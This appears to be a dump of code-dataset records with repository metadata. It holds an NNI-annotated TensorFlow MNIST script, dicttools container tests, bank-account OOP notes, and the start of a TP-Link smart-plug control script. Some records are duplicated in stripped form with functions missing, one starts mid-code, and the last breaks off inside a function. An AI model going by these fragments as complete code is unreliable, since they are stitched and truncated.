raise Exception("Failed to download MNIST.")
def main(params):
'''
Main function, build mnist network, run and send result to NNI.
'''
# Import data
mnist = download_mnist_retry(params['data_dir'])
print('Mnist download data done.')
logger.debug('Mnist download data done.')
# Create the model
# Build the graph for the deep net
mnist_network = MnistNetwork(channel_1_num=params['channel_1_num'],
channel_2_num=params['channel_2_num'],
conv_size=params['conv_size'],
hidden_size=params['hidden_size'],
pool_size=params['pool_size'],
learning_rate=params['learning_rate'])
mnist_network.build_network()
logger.debug('Mnist build network done.')
# Write log
graph_location = tempfile.mkdtemp()
logger.debug('Saving graph to: %s', graph_location)
train_writer = tf.summary.FileWriter(graph_location)
train_writer.add_graph(tf.get_default_graph())
test_acc = 0.0
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
"""@nni.variable(nni.choice(50, 250, 500), name=batch_num)"""
batch_num = params['batch_num']
for i in range(batch_num):
batch = mnist.train.next_batch(batch_num)
"""@nni.variable(nni.choice(1, 5), name=dropout_rate)"""
dropout_rate = params['dropout_rate']
mnist_network.train_step.run(feed_dict={mnist_network.images: batch[0],
mnist_network.labels: batch[1],
mnist_network.keep_prob: dropout_rate}
)
if i % 100 == 0:
test_acc = mnist_network.accuracy.eval(
feed_dict={mnist_network.images: mnist.test.images,
mnist_network.labels: mnist.test.labels,
mnist_network.keep_prob: 1.0})
"""@nni.report_intermediate_result(test_acc)"""
logger.debug('test accuracy %g', test_acc)
logger.debug('Pipe send intermediate result done.')
test_acc = mnist_network.accuracy.eval(
feed_dict={mnist_network.images: mnist.test.images,
mnist_network.labels: mnist.test.labels,
mnist_network.keep_prob: 1.0})
"""@nni.report_final_result(test_acc)"""
logger.debug('Final result is %g', test_acc)
logger.debug('Send final result done.')
def generate_defualt_params():
'''
Generate default parameters for mnist network.
'''
params = {
'data_dir': '/tmp/tensorflow/mnist/input_data',
'dropout_rate': 0.5,
'channel_1_num': 32,
'channel_2_num': 64,
'conv_size': 5,
'pool_size': 2,
'hidden_size': 1024,
'learning_rate': 1e-4,
'batch_num': 200}
return params
if __name__ == '__main__':
"""@nni.get_next_parameter()"""
try:
main(generate_defualt_params())
except Exception as exception:
logger.exception(exception)
raise
| 41.203774 | 202 | 0.62176 | #!/usr/bin/python
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""A deep MNIST classifier using convolutional layers."""
import logging
import math
import tempfile
import time
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
FLAGS = None
logger = logging.getLogger('mnist_AutoML')
class MnistNetwork(object):
'''
MnistNetwork is for initlizing and building basic network for mnist.
'''
def __init__(self,
channel_1_num,
channel_2_num,
conv_size,
hidden_size,
pool_size,
learning_rate,
x_dim=784,
y_dim=10):
self.channel_1_num = channel_1_num
self.channel_2_num = channel_2_num
"""@nni.variable(nni.choice(2, 3, 5, 7),name=self.conv_size)"""
self.conv_size = conv_size
"""@nni.variable(nni.choice(124, 512, 1024), name=self.hidden_size)"""
self.hidden_size = hidden_size
self.pool_size = pool_size
"""@nni.variable(nni.uniform(0.0001, 0.1), name=self.learning_rate)"""
self.learning_rate = learning_rate
self.x_dim = x_dim
self.y_dim = y_dim
self.images = tf.placeholder(tf.float32, [None, self.x_dim], name='input_x')
self.labels = tf.placeholder(tf.float32, [None, self.y_dim], name='input_y')
self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
self.train_step = None
self.accuracy = None
def build_network(self):
'''
Building network for mnist
'''
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
with tf.name_scope('reshape'):
try:
input_dim = int(math.sqrt(self.x_dim))
except:
print(
'input dim cannot be sqrt and reshape. input dim: ' + str(self.x_dim))
logger.debug(
'input dim cannot be sqrt and reshape. input dim: %s', str(self.x_dim))
raise
x_image = tf.reshape(self.images, [-1, input_dim, input_dim, 1])
# First convolutional layer - maps one grayscale image to 32 feature maps.
with tf.name_scope('conv1'):
w_conv1 = weight_variable(
[self.conv_size, self.conv_size, 1, self.channel_1_num])
b_conv1 = bias_variable([self.channel_1_num])
"""@nni.function_choice(tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1), tf.nn.sigmoid(conv2d(x_image, w_conv1) + b_conv1), tf.nn.tanh(conv2d(x_image, w_conv1) + b_conv1), name=tf.nn.relu)"""
h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1)
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
"""@nni.function_choice(max_pool(h_conv1, self.pool_size), avg_pool(h_conv1, self.pool_size), name=max_pool)"""
h_pool1 = max_pool(h_conv1, self.pool_size)
# Second convolutional layer -- maps 32 feature maps to 64.
with tf.name_scope('conv2'):
w_conv2 = weight_variable([self.conv_size, self.conv_size,
self.channel_1_num, self.channel_2_num])
b_conv2 = bias_variable([self.channel_2_num])
h_conv2 = tf.nn.relu(conv2d(h_pool1, w_conv2) + b_conv2)
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool(h_conv2, self.pool_size)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
last_dim = int(input_dim / (self.pool_size * self.pool_size))
with tf.name_scope('fc1'):
w_fc1 = weight_variable(
[last_dim * last_dim * self.channel_2_num, self.hidden_size])
b_fc1 = bias_variable([self.hidden_size])
h_pool2_flat = tf.reshape(
h_pool2, [-1, last_dim * last_dim * self.channel_2_num])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, w_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of features.
with tf.name_scope('dropout'):
h_fc1_drop = tf.nn.dropout(h_fc1, self.keep_prob)
# Map the 1024 features to 10 classes, one for each digit
with tf.name_scope('fc2'):
w_fc2 = weight_variable([self.hidden_size, self.y_dim])
b_fc2 = bias_variable([self.y_dim])
y_conv = tf.matmul(h_fc1_drop, w_fc2) + b_fc2
with tf.name_scope('loss'):
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=self.labels, logits=y_conv))
with tf.name_scope('adam_optimizer'):
self.train_step = tf.train.AdamOptimizer(
self.learning_rate).minimize(cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(
tf.argmax(y_conv, 1), tf.argmax(self.labels, 1))
self.accuracy = tf.reduce_mean(
tf.cast(correct_prediction, tf.float32))
def conv2d(x_input, w_matrix):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x_input, w_matrix, strides=[1, 1, 1, 1], padding='SAME')
def max_pool(x_input, pool_size):
"""max_pool downsamples a feature map by 2X."""
return tf.nn.max_pool(x_input, ksize=[1, pool_size, pool_size, 1],
strides=[1, pool_size, pool_size, 1], padding='SAME')
def avg_pool(x_input, pool_size):
return tf.nn.avg_pool(x_input, ksize=[1, pool_size, pool_size, 1],
strides=[1, pool_size, pool_size, 1], padding='SAME')
def weight_variable(shape):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def download_mnist_retry(data_dir, max_num_retries=20):
"""Try to download mnist dataset and avoid errors"""
for _ in range(max_num_retries):
try:
return input_data.read_data_sets(data_dir, one_hot=True)
except tf.errors.AlreadyExistsError:
time.sleep(1)
raise Exception("Failed to download MNIST.")
def main(params):
'''
Main function, build mnist network, run and send result to NNI.
'''
# Import data
mnist = download_mnist_retry(params['data_dir'])
print('Mnist download data done.')
logger.debug('Mnist download data done.')
# Create the model
# Build the graph for the deep net
mnist_network = MnistNetwork(channel_1_num=params['channel_1_num'],
channel_2_num=params['channel_2_num'],
conv_size=params['conv_size'],
hidden_size=params['hidden_size'],
pool_size=params['pool_size'],
learning_rate=params['learning_rate'])
mnist_network.build_network()
logger.debug('Mnist build network done.')
# Write log
graph_location = tempfile.mkdtemp()
logger.debug('Saving graph to: %s', graph_location)
train_writer = tf.summary.FileWriter(graph_location)
train_writer.add_graph(tf.get_default_graph())
test_acc = 0.0
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
"""@nni.variable(nni.choice(50, 250, 500), name=batch_num)"""
batch_num = params['batch_num']
for i in range(batch_num):
batch = mnist.train.next_batch(batch_num)
"""@nni.variable(nni.choice(1, 5), name=dropout_rate)"""
dropout_rate = params['dropout_rate']
mnist_network.train_step.run(feed_dict={mnist_network.images: batch[0],
mnist_network.labels: batch[1],
mnist_network.keep_prob: dropout_rate}
)
if i % 100 == 0:
test_acc = mnist_network.accuracy.eval(
feed_dict={mnist_network.images: mnist.test.images,
mnist_network.labels: mnist.test.labels,
mnist_network.keep_prob: 1.0})
"""@nni.report_intermediate_result(test_acc)"""
logger.debug('test accuracy %g', test_acc)
logger.debug('Pipe send intermediate result done.')
test_acc = mnist_network.accuracy.eval(
feed_dict={mnist_network.images: mnist.test.images,
mnist_network.labels: mnist.test.labels,
mnist_network.keep_prob: 1.0})
"""@nni.report_final_result(test_acc)"""
logger.debug('Final result is %g', test_acc)
logger.debug('Send final result done.')
def generate_defualt_params():
'''
Generate default parameters for mnist network.
'''
params = {
'data_dir': '/tmp/tensorflow/mnist/input_data',
'dropout_rate': 0.5,
'channel_1_num': 32,
'channel_2_num': 64,
'conv_size': 5,
'pool_size': 2,
'hidden_size': 1024,
'learning_rate': 1e-4,
'batch_num': 200}
return params
if __name__ == '__main__':
"""@nni.get_next_parameter()"""
try:
main(generate_defualt_params())
except Exception as exception:
logger.exception(exception)
raise
| 1,222 | 0 | 49 |
593b6dff1470a200eb27d91c864a91ea81f247b7 | 14,847 | py | Python | dicttools/tests/test_containers.py | trzemecki/dicttools | 24f040d5c3ab91fc6eeb72cf8a392f7a34026989 | [
"Apache-2.0"
] | 2 | 2016-06-03T16:04:27.000Z | 2018-02-14T14:50:35.000Z | dicttools/tests/test_containers.py | trzemecki/dicttools | 24f040d5c3ab91fc6eeb72cf8a392f7a34026989 | [
"Apache-2.0"
] | 3 | 2018-03-05T16:55:26.000Z | 2020-10-22T16:43:08.000Z | dicttools/tests/test_containers.py | trzemecki/dicttools | 24f040d5c3ab91fc6eeb72cf8a392f7a34026989 | [
"Apache-2.0"
] | 2 | 2018-02-14T14:50:41.000Z | 2020-10-21T13:48:20.000Z | from __future__ import absolute_import
import unittest
import six
import dicttools
| 28.998047 | 97 | 0.592308 | from __future__ import absolute_import
import unittest
import six
import dicttools
class FrozenDictTests(unittest.TestCase):
def test_Init_CreateEmptyFrozenDict_LengthIs0(self):
instance = self.create()
self.assertEqual(0, len(instance))
def test_Init_CreateFromMapping_LengthIsEqualToMappingLength(self):
instance = self.create({'a': 1, 'b': 2})
self.assertEqual(2, len(instance))
def test_Init_CreateFromMapping_SaveContentFromMapping(self):
instance = self.create({'a': 1, 'b': 2})
self.assertEqual(1, instance['a'])
def test_Init_CreateFromList_SaveContentFromIterablePairKeyValue(self):
instance = self.create([('pi', 3.14), ('e', 2.72)])
self.assertEqual(3.14, instance['pi'])
def test_Init_CreateFromList_LengthIsEqualToMappingLength(self):
instance = self.create([('pi', 3.14), ('e', 2.72)])
self.assertEqual(2, len(instance))
def test_Init_CreateFromKwargs_SaveContentFromGivenAssignments(self):
instance = self.create(pi=3.14, e=2.72)
self.assertEqual(2.72, instance['e'])
def test_Init_CreateFromKwargsAndFromMapping_SaveContentFromGivenAssignmentsAndMapping(self):
instance = self.create({'pi': 3.14}, e=2.72)
self.assertEqual(2.72, instance['e'])
def test_Init_KeyInKwargsAndFromMappingIsRepeated_SaveValueFormKwargs(self):
instance = self.create({'e': 3.14}, e=2.72)
self.assertEqual(2.72, instance['e'])
def test_Init_IterableValuesAreNotPairs_Throws(self):
with self.assertRaisesRegexp(TypeError, "'int' object is not iterable"):
self.create([1, 2, 3])
def test_GetItem_NotExists_Throws(self):
instance = self.create({'b': 1, 'd': 2})
with self.assertRaisesRegexp(KeyError, 'c'):
result = instance['c']
def test_Contains_KeyNotIn_ReturnFalse(self):
instance = self.create({'b': 1, 'd': 2})
self.assertNotIn('c', instance)
def test_Contains_KeyIsIn_ReturnTrue(self):
instance = self.create({'b': 1, 'd': 2})
self.assertIn('b', instance)
def test_HasKey_KeyNotIn_ReturnFalse(self):
instance = self.create({'b': 1, 'd': 2})
self.assertFalse(instance.has_key('c'))
def test_HasKey_KeyIsIn_ReturnTrue(self):
instance = self.create({'b': 1, 'd': 2})
self.assertTrue(instance.has_key('b'))
def test_Get_KeyFound_ReturnValueForGivenKey(self):
instance = self.create({'b': 1, 'd': 2})
self.assertEqual(1, instance.get('b'))
def test_Get_KeyNotFoundAndDefaultNotGiven_ReturnNone(self):
instance = self.create({'b': 1, 'd': 2})
self.assertIsNone(instance.get('c'))
def test_Get_KeyNotFoundAndDefaultWasGiven_ReturnDefault(self):
instance = self.create({'b': 1, 'd': 2})
self.assertEqual(2.4, instance.get('c', 2.4))
def test_Items_Always_ReturnListOfKeyValuePaorsAs2Tuples(self):
instance = self.create({'b': 1, 'd': 2})
result = instance.items()
self.assertEqual([('b', 1), ('d', 2)], list(result))
def test_Values_Always_ReturnListOfValues(self):
instance = self.create({'b': 1, 'd': 2})
result = instance.values()
self.assertEqual([1, 2], list(result))
def test_Keys_Always_ReturnListOfKeys(self):
instance = self.create({'b': 1, 'd': 2})
result = instance.keys()
self.assertEqual(['b', 'd'], list(result))
def test_Keys_InitWitKeysInOrder_KeepKeysInGivenOrder(self):
instance = self.create([('d', 1), ('b', 2), ('c', 3)])
result = instance.keys()
self.assertEqual(['d', 'b', 'c'], list(result))
def test_Str_Always_IsDollarAndKeyValuePairsInBraces(self):
instance = self.create({'b': 1, 'd': 2})
self.assertEqual("${'b': 1, 'd': 2}", str(instance))
def test_Equal_SameObject_ReturnTrue(self):
instance = self.create({'b': 1, 'd': 2})
self.assertEqual(instance, instance)
def test_Equal_SameContent_ReturnTrue(self):
a = self.create({'b': 1, 'd': 2})
b = self.create({'d': 2, 'b': 1})
self.assertEqual(a, b)
def test_Equal_DifferentContent_ReturnFalse(self):
a = self.create({'b': 1, 'd': 2})
b = self.create({'d': 2, 'c': 1})
self.assertNotEqual(a, b)
def test_Equal_ToDictWithSameContent_ReturnTrue(self):
a = self.create({'b': 1, 'd': 2})
b = {'b': 1, 'd': 2}
self.assertEqual(a, b)
def test_Iter_Always_IterOverKeys(self):
instance = self.create({'b': 1, 'd': 2})
result = iter(instance)
self.assertEqual('b', next(result))
self.assertEqual('d', next(result))
with self.assertRaises(StopIteration):
next(result)
def test_Hash_ForEqualInstances_AreEqual(self):
a = self.create({'b': 1, 'd': 2})
b = self.create({'d': 2, 'b': 1})
self.assertEqual(hash(a), hash(b))
def test_Hash_ForDifferentInstances_AreDifferent(self):
a = self.create({'b': 1, 'd': 2})
b = self.create({'d': 2, 'c': 1})
self.assertNotEqual(hash(a), hash(b))
def test_CastToDict_Always_DictContainsAllItemsFromFrozenDict(self):
frozen = self.create({'b': 1, 'd': 2})
result = dict(frozen)
self.assertEqual({'b': 1, 'd': 2}, result)
def test_Copy_Always_ReturnNewObject(self):
frozen = self.create({'b': 1, 'd': 2})
self.assertIsNot(frozen, frozen.copy())
def test_Copy_Always_ReturnEqualObject(self):
frozen = self.create({'b': 1, 'd': 2})
self.assertEqual(frozen, frozen.copy())
if six.PY2:
def test_IterItems_Always_ReturnGeneratorOfKeyValuePairsAs2Tuples(self):
instance = self.create({'b': 1, 'd': 2})
result = instance.iteritems()
self.assertEqual(('b', 1), next(result))
self.assertEqual(('d', 2), next(result))
with self.assertRaises(StopIteration):
next(result)
def test_IterValues_Always_ReturnGeneratorOfValues(self):
instance = self.create({'b': 1, 'd': 2})
result = instance.itervalues()
self.assertEqual(1, next(result))
self.assertEqual(2, next(result))
with self.assertRaises(StopIteration):
next(result)
def test_IterKeys_Always_ReturnGeneratorOfKeys(self):
instance = self.create({'b': 1, 'd': 2})
result = instance.iterkeys()
self.assertEqual('b', next(result))
self.assertEqual('d', next(result))
with self.assertRaises(StopIteration):
next(result)
@staticmethod
def create(*args, **kwargs):
return dicttools.FrozenDict(*args, **kwargs)
class ChainMapTest(unittest.TestCase):
def test_GetItem_ItemInLastDict_ReturnValue(self):
chain = self.create([
{'a': 1, 'b': 2},
{'c': 3, 'd': 4},
{'e': 5, 'f': 6},
])
self.assertEqual(6, chain['f'])
def test_GetItem_ItemInFirstAndLastDict_ReturnValueFromFirst(self):
chain = self.create([
{'a': 1, 'b': 2},
{'c': 3, 'd': 4},
{'e': 5, 'a': 6},
])
self.assertEqual(1, chain['a'])
def test_GetItem_ItemNotInChain_Throws(self):
chain = self.create([
{'a': 1, 'b': 2},
{'c': 3, 'd': 4},
{'e': 5, 'f': 6},
])
with self.assertRaisesRegexp(KeyError, 'g'):
r = chain['g']
def test_Get_ItemInChain_ReturnValue(self):
chain = self.create([
{'a': 1, 'b': 2},
{'c': 3, 'd': 4},
{'e': 5, 'f': 6},
])
self.assertEqual(4, chain.get('d', -1))
def test_Get_ItemNotInChain_ReturnValue(self):
chain = self.create([
{'a': 1, 'b': 2},
{'c': 3, 'd': 4},
{'e': 5, 'f': 6},
])
self.assertEqual(-1, chain.get('x', -1))
def test_SetItem_ItemInOneMap_ChangeValueInMap(self):
chain = self.create([
{'a': 1, 'b': 2},
{'c': 3, 'd': 4},
{'e': 5, 'f': 6},
])
chain['d'] = 98
self.assertEqual(98, chain['d'])
def test_SetItem_ItemInManyMaps_ChangeValueInFirstFoundedMap(self):
maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
chain = self.create(maps)
chain['a'] = 98
self.assertEqual(98, maps[0]['a'])
self.assertEqual(6, maps[-1]['a'])
def test_SetItem_ItemNotInChain_Throws(self):
maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
chain = self.create(maps)
with self.assertRaisesRegexp(KeyError, 'x'):
chain['x'] = 98
def test_DelItem_ItemInManyMaps_DeleteFirstFoundedItem(self):
maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
chain = self.create(maps)
del chain['a']
self.assertEqual(6, chain['a'])
def test_DelItem_ItemNotInChain_Throws(self):
maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
chain = self.create(maps)
with self.assertRaisesRegexp(KeyError, 'x'):
del chain['x']
def test_Len_Always_ReturnSumOfLengthOfMaps(self):
maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
chain = self.create(maps)
self.assertEqual(6, len(chain))
def test_Iter_Always_ReturnKeysGenerator(self):
maps = [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'a': 6}]
chain = self.create(maps)
result = sorted(chain)
self.assertEqual(['a', 'a', 'b', 'c', 'd', 'e'], result)
@staticmethod
def create(maps):
return dicttools.ChainMap(maps)
class TwoWayDictTest(unittest.TestCase):
def test_Init_GiveDictWith2UniqueValues_Contains4Elements(self):
container = self.create({'alpha': 'beta', 'gamma': 'delta'})
self.assertEqual(4, len(container))
def test_Init_GiveDictWith1EqualKeyAndValue_Contains1Elements(self):
container = self.create({'alpha': 'alpha'})
self.assertEqual(1, len(container))
def test_Init_GiveDictWithPairAndReversedPair_Contains2Elements(self):
container = self.create({'alpha': 'beta', 'beta': 'alpha'})
self.assertEqual(2, len(container))
def test_Init_GiveDictWithNotHashableValue_Throws(self):
with self.assertRaisesRegexp(TypeError, "unhashable type: 'list'"):
container = self.create({'alpha': ['beta']})
def test_SetItem_GetByKey_ReturnValue(self):
container = self.create()
container['alpha'] = 'omega'
self.assertEqual('omega', container['alpha'])
def test_SetItem_GetByValue_ReturnKey(self):
container = self.create()
container['alpha'] = 'omega'
self.assertEqual('alpha', container['omega'])
def test_GetItem_ItemNotFound_Throws(self):
container = self.create()
container['alpha'] = 'omega'
with self.assertRaises(KeyError):
value = container['delta']
def test_Len_2ElementsAssigned_Return4(self):
container = self.create()
container['alpha'] = 'omega'
container['delta'] = 'beta'
result = len(container)
self.assertEqual(4, result)
def test_SetItem_ReassignExistedKey_RemovePreviousValue(self):
container = self.create()
container['alpha'] = 'omega'
container['alpha'] = 'beta'
with self.assertRaises(KeyError):
value = container['omega']
def test_SetItem_ReassignExistedValue_RemovePreviousKey(self):
container = self.create()
container['alpha'] = 'omega'
container['delta'] = 'omega'
with self.assertRaises(KeyError):
value = container['alpha']
def test_SetItem_ReassignTheSameValue_Contains2Values(self):
container = self.create()
container['alpha'] = 'omega'
container['alpha'] = 'omega'
self.assertEqual(2, len(container))
def test_SetItem_ReassignReversed_Contains2Values(self):
container = self.create()
container['alpha'] = 'omega'
container['omega'] = 'alpha'
self.assertEqual(2, len(container))
def test_SetItem_AssignNotHashableElement_DoNotModify(self):
container = self.create()
container['alpha'] = 'omega'
with self.assertRaisesRegexp(TypeError, "unhashable type: 'list'"):
container['delta'] = ['beta']
self.assertEqual(2, len(container))
def test_Iter_Always_IterByBothKeyAndValues(self):
container = self.create()
container['alpha'] = 'omega'
container['delta'] = 'beta'
result = set(iter(container))
self.assertEqual({'alpha', 'beta', 'delta', 'omega'}, result)
def test_SetItem_ReassignEqualKeyAndValue_Contains1Values(self):
container = self.create()
container['alpha'] = 'alpha'
container['alpha'] = 'alpha'
self.assertEqual(1, len(container))
def test_DelItem_DeleteKey_RemoveKeyAndValue(self):
container = self.create()
container['alpha'] = 'omega'
container['delta'] = 'beta'
del container['delta']
result = set(iter(container))
self.assertEqual({'alpha', 'omega'}, result)
def test_DelItem_DeleteValue_RemoveKeyAndValue(self):
container = self.create()
container['alpha'] = 'omega'
container['delta'] = 'beta'
del container['beta']
result = set(iter(container))
self.assertEqual({'alpha', 'omega'}, result)
def test_DelItem_SameKeyAndValue_RemoveBoth(self):
container = self.create()
container['alpha'] = 'alpha'
container['delta'] = 'beta'
del container['alpha']
result = set(iter(container))
self.assertEqual({'delta', 'beta'}, result)
def test_Str_OnePair_ReturnStringWithKeyValuesPairsAsSimpleDict(self):
container = self.create()
container['delta'] = 'beta'
self.assertEqual("{'delta': 'beta', 'beta': 'delta'}", str(container))
def test_Str_EqualKeyAndValue_Return1Value(self):
container = self.create()
container['alpha'] = 'alpha'
self.assertEqual("{'alpha': 'alpha'}", str(container))
def test_Repr_Always_ReturnStringWithOnlyDirectAssignment(self):
container = self.create()
container['delta'] = 'beta'
self.assertEqual("TwoWayDict({'delta': 'beta'})", repr(container))
@staticmethod
def create(*args, **kwargs):
return dicttools.TwoWayDict(*args, **kwargs)
| 12,627 | 2,062 | 69 |
e8cd785aee5009e5743f3d93753fd80c11d0befb | 3,653 | py | Python | bank_oop notes/bankapp.py | shadowp2810/python_GUI_BookShelf_DB_OOPv | 37567485ee2212fcfe755c963b7880bcff6e480c | [
"MIT"
] | null | null | null | bank_oop notes/bankapp.py | shadowp2810/python_GUI_BookShelf_DB_OOPv | 37567485ee2212fcfe755c963b7880bcff6e480c | [
"MIT"
] | null | null | null | bank_oop notes/bankapp.py | shadowp2810/python_GUI_BookShelf_DB_OOPv | 37567485ee2212fcfe755c963b7880bcff6e480c | [
"MIT"
] | null | null | null |
# Inheritance
class Checking( Account ): # We pass the base class as an argument for Checking class to inherit
"""This class generates checking account objects""" # doc strings to describe a class
type = "checking" # is a class variable. declared outside the methods of a class. shared by all instances of a class
#---------------------
account = Account( "importedFiles/balance.txt" ) # <account.bankapp.Account > Package, Module, Class
print( account )
print( "Current Balance: %s" %( account.balance ) )
# account.withdraw( 100 )
# account.deposit( 100 )
# print( "New Balance: %s" %( account.balance ) )
# account.commit()
#---------------------
# Inheritance
checking = Checking( "importedFiles/balance.txt" , 1 ) # `checking` is an object # has an atribute `fee`
print( checking )
print( "Current Balance: %s" %( checking.balance ) )
# checking.deposit(10)
# checking.transfer(100)
# checking.commit()
# print( "New Balance: %s" %( checking.balance ) )
#---------------------
# Inheritance class variable
# jacks_checking = Checking( "importedFiles/jack.txt" , 1 )
# jacks_checking.transfer(100)
# print( jacks_checking )
# print( "Current Balance for Jack: %s" %( jacks_checking.balance ) )
# jacks_checking.commit()
# print( jacks_checking.type )
# johns_checking = Checking( "importedFiles/john.txt" , 1 )
# johns_checking.transfer(100)
# print( johns_checking )
# print( "Current Balance for Jack: %s" %( johns_checking.balance ) )
# johns_checking.commit()
# print( johns_checking.type )
#---------------------
# Doc String
# print( johns_checking.__doc__) # doc strings to describe a class
#---------------------
# Data Memebers
# are instance variables or class variables
#---------------------
# Constructors
# are the __init__ functions or methods in a class and constructs the class
#---------------------
# Class Methods
# applied to the objects instance, eg transfer, deposit
#---------------------
# Instantiation
# is the process of creating object instances or instances of a class
# eg: johns_checking = Checking( "importedFiles/john.txt" , 1 )
#---------------------
# Inheritance
# is the process of creating a subclass. has methods of inherited class plus its own methods
#---------------------
# Attributes
# class and instance variables that can be accessed
# eg: # print( johns_checking.type ) where .type is an arttribute
# eg: # print( johns_checking.balance ) where .balance is an arttribute
| 33.513761 | 145 | 0.619765 | class Account: # Class or prototype of object that is about to be created
def __init__( self , filepath ):
self.filepath = filepath # can name anything like self.anyname = filepath, anyname in self.anyname is an instance variable
with open( filepath , 'r' ) as file: # read mode
self.balance = int(file.read()) # balance is the instance and self is the object
def withdraw( self , amount ):
self.balance = self.balance - amount
def deposit( self , amount ):
self.balance = self.balance + amount
def commit( self ): # commit changes to balance.txt
with open( self.filepath , 'w' ) as file: # write mode
file.write( str( self.balance ) )
# Inheritance
class Checking( Account ): # We pass the base class as an argument for Checking class to inherit
"""This class generates checking account objects""" # doc strings to describe a class
type = "checking" # is a class variable. declared outside the methods of a class. shared by all instances of a class
def __init__( self , filepath , fee ): # when this method is executed
Account.__init__( self , filepath ) # this method from Account is executed
self.fee = fee
def transfer( self , amount ):
self.balance = self.balance - amount - self.fee
#---------------------
account = Account( "importedFiles/balance.txt" ) # <account.bankapp.Account > Package, Module, Class
print( account )
print( "Current Balance: %s" %( account.balance ) )
# account.withdraw( 100 )
# account.deposit( 100 )
# print( "New Balance: %s" %( account.balance ) )
# account.commit()
#---------------------
# Inheritance
checking = Checking( "importedFiles/balance.txt" , 1 ) # `checking` is an object # has an atribute `fee`
print( checking )
print( "Current Balance: %s" %( checking.balance ) )
# checking.deposit(10)
# checking.transfer(100)
# checking.commit()
# print( "New Balance: %s" %( checking.balance ) )
#---------------------
# Inheritance class variable
# jacks_checking = Checking( "importedFiles/jack.txt" , 1 )
# jacks_checking.transfer(100)
# print( jacks_checking )
# print( "Current Balance for Jack: %s" %( jacks_checking.balance ) )
# jacks_checking.commit()
# print( jacks_checking.type )
# johns_checking = Checking( "importedFiles/john.txt" , 1 )
# johns_checking.transfer(100)
# print( johns_checking )
# print( "Current Balance for Jack: %s" %( johns_checking.balance ) )
# johns_checking.commit()
# print( johns_checking.type )
#---------------------
# Doc String
# print( johns_checking.__doc__) # doc strings to describe a class
#---------------------
# Data Memebers
# are instance variables or class variables
#---------------------
# Constructors
# are the __init__ functions or methods in a class and constructs the class
#---------------------
# Class Methods
# applied to the objects instance, eg transfer, deposit
#---------------------
# Instantiation
# is the process of creating object instances or instances of a class
# eg: johns_checking = Checking( "importedFiles/john.txt" , 1 )
#---------------------
# Inheritance
# is the process of creating a subclass. has methods of inherited class plus its own methods
#---------------------
# Attributes
# class and instance variables that can be accessed
# eg: # print( johns_checking.type ) where .type is an arttribute
# eg: # print( johns_checking.balance ) where .balance is an arttribute
| 842 | 85 | 226 |
6b2bf4081d40274e7e0f8d92546a36c652f943b5 | 923 | py | Python | tpplug.py | czirakim/SMSalert.shutdown.PI | 07a23259c77c6b24b18e18c16d8b0ea0db1b07ae | [
"MIT"
] | null | null | null | tpplug.py | czirakim/SMSalert.shutdown.PI | 07a23259c77c6b24b18e18c16d8b0ea0db1b07ae | [
"MIT"
] | null | null | null | tpplug.py | czirakim/SMSalert.shutdown.PI | 07a23259c77c6b24b18e18c16d8b0ea0db1b07ae | [
"MIT"
] | null | null | null | import socket
from struct import pack
ip='192.168.8.211'
port='9999'
commands = {'on' : '{"system":{"set_relay_state":{"state":1}}}',
'off' : '{"system":{"set_relay_state":{"state":0}}}',
'info' : '{"system":{"get_sysinfo":{}}}'}
| 23.666667 | 70 | 0.56338 | import socket
from struct import pack
ip='192.168.8.211'
port='9999'
commands = {'on' : '{"system":{"set_relay_state":{"state":1}}}',
'off' : '{"system":{"set_relay_state":{"state":0}}}',
'info' : '{"system":{"get_sysinfo":{}}}'}
def encrypt(string):
key = 171
result = pack(">I", len(string))
for i in string:
a = key ^ ord(i)
key = a
result += bytes([a])
return result
def decrypt(string):
key = 171
result = ""
for i in string:
